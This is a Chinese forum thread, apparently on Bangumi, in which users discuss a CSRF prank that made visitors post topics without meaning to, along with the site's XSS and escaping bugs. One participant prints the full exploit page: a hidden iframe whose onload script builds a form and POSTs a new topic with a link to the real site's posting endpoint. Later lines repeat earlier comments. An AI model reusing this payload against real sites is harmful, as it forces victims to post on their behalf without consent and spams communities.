upsuper 说: 直接看代码不就好了(
OtakuThinking 说: 直接跳转了好不喂! 还有都被你刷屏了啊喂! 你看看好多人中枪了啊!
upsuper 说: 嘛,如果都不知道该怎么看到这个代码……我觉得你大概看了也不知道是怎么实现的…… 另外没看到几个中枪的啊(
OtakuThinking 说: 已经被你刷屏了啊喂 那就先从怎么看到代码开始教学吧=w=…… 资料也行……
yzyzsun 说: <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title></title> &...
upsuper 说: 嗯,这只是1
四叠半糯米团子 说: 前面加了日期的话翻不到其他的... 一般我都新开个IE打开这种页面
upsuper 说: 你们看到这么多贴还敢点的都是在卖萌吧(
orange 说: 刚才我下载了网页看了一下,但是我根本看不懂。是javascript吗,为什么会这样?
upsuper 说: 嘛……关键词 csrf 你搜一下就知道了
OtakuThinking 说: 感觉现在的状况已经可以算作吵闹攻击了吧…… 好像变慢好多是我的错觉吗?
upsuper 说: 本来就是攻击啊,只不过没什么严重的危害而已(
金玉其外的结城照美(仮) 说: 一开始觉得你真是来乱的,看到这句突然觉得瑕不掩瑜啊!
upsuper 说: 其实这个炸潜水的能力还不强,发了能删,要有发了不能删的才好
chaucer绫 说: 有没有留言的bug,如果有的话,发了立刻回复就不能删了
金玉其外的结城照美(仮) 说: 快住嘴!会被麻将姬听到的啊!!
自動麻將姬 说: 咕嘿嘿
upsuper 说: 然后就改不回去了?咱相信 sai 不会那么坏( 有很多漏网之鱼的说,但是这次这个地方可以搞真是有点出乎我意料
Ruby 说: 可以改回去。。。之前v2ex就有人和livid意见不合啦过几天就发现登录不了,重置密码后过几天又登录不了,超奇怪的处理。。。(今天我还看到livid很严肃地回复了一个跟他开玩笑的帖子。。。)
upsuper 说: ajax 是做不到的哦,因为有跨域限制
BinotaLiu 说: 對哦=w="" 那就換別的方法((
BinotaLiu 说: 仔細想想的話……早知道上次那個 XSS 就不提交了(大霧 http://bangumi.tv/group/topic/30727
upsuper 说: 喔喔,xss 比 csrf 找起来麻烦呢,不过危害大得多的说
BinotaLiu 说: 這麼說來的話…… CSRF 的修補跟 XSS 比起來呢?
upsuper 说: 回的了头,轻轻一点 del 即可
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title></title> <style type="text/css"> iframe { border: 0 none; } </style> </head> <body onload="doit()"> <p>载入中,请稍后……</p> <iframe id="iframe" width="0" height="0" src="about:blank"></iframe> <script type="text/javascript"> var bgm_domain = /b(bangumi.tv|bgm.tv|chii.in)b/; var domain = document.referrer.match(bgm_domain); domain = domain ? domain[0] : 'bangumi.tv'; var $iframe = document.getElementById("iframe"); function doit() { $iframe.contentWindow.document.body.innerHTML = '<form action="http://' + domain + '/group/364/topic/new"' + ' method="POST" id="form" target="_parent">n' + '<input name="title" value="因为很好玩所以决定试一试">n' + '<input name="content" value="嗯嗯~ [url]http://t.cn/8sjGJgk[/url]">n' + '</form>'; $iframe.contentWindow.document.getElementById('form').submit(); } </script> </body> </html>
upsuper 说: 因为已经不能发新帖了(
BinotaLiu -- '_>` 说: 既然不能發新帖,就改成發回復再這樓吧(
upsuper 说: 哦,也好,我去改一下吧
BinotaLiu -- '_>` 说: 是我的错觉还是引用真的会对HTML字符转译两次
upsuper 说: 转义这种小 bug 太多了…… 话说那个漏洞被休掉了呢,改晚了w
BinotaLiu -- '_>` 说: 一直觉得Bangumi 的转译很奇怪…… 现在知道是写入数据库前一定会有一次分号的转译, 可是昨天又发现在某些地方, 打印前又做了一次分号的转译(打印前转译分号就没用了吧
upsuper 说: 分号?我倒是发现斜杠的转义很诡异……
BinotaLiu -- '_>` 说: 我的 ID 后 -- '_>` 在时空管理局会变 -- '_>` 斜杠怎么样诡异?
BinotaLiu -- '_>` 说: 等等我發現现在沒辦法编辑了…… -- '_>` 会变這個才对,忘了斜杠要打两次
upsuper 说: 啊应该是反斜杠 你看 #19 的代码你就会发现里面的反斜杠全都丢失了,如果想要打出反斜杠的话要两个反斜杠,而且你编辑的时候会发现两个反斜杠又变成一个了,你如果不补一个,保存的时候就会消失(
upsuper 说: 对,暂时没法编辑了,应该是修漏洞的时候一些功能受到影响了
upsuper 说: 多好玩啊ww
若卡 说: 来晚了,让他们发了什么……“诸君,我是个超M的变态,请让我舔脚吧!” 这样的么
金玉其外的结城照美(仮) 说: 等等,还真的关闭发帖了???!!
upsuper 说: 真的哦
靠谱人生茶话会
还有都被你刷屏了啊喂!
你看看好多人中枪了啊!
另外没看到几个中枪的啊(
那就先从怎么看到代码开始教学吧=w=……
资料也行……
正在配合W3慢慢啃
一般我都新开个IE打开这种页面
好像变慢好多是我的错觉吗?
然后现在大家觉得奇怪然后多点了几次然后就被刷屏了
我感觉这样变得稍微有些奇怪了……原来不是吵闹攻击的样子……
有很多漏网之鱼的说,但是这次这个地方可以搞真是有点出乎我意料
http://bgm.tv/group/topic/30727
怎么样改可以使每多点一次加一个”再"?
话说那个漏洞被休掉了呢,改晚了w
现在知道是写入数据库前一定会有一次分号的转译,
可是昨天又发现在某些地方,
打印前又做了一次分号的转译(打印前转译分号就没用了吧
斜杠怎么样诡异?
你看 #19 的代码你就会发现里面的反斜杠全都丢失了,如果想要打出反斜杠的话要两个反斜杠,而且你编辑的时候会发现两个反斜杠又变成一个了,你如果不补一个,保存的时候就会消失(
Sai 大怎么不找几个自愿者做维护……Bangumi 里各种人才啊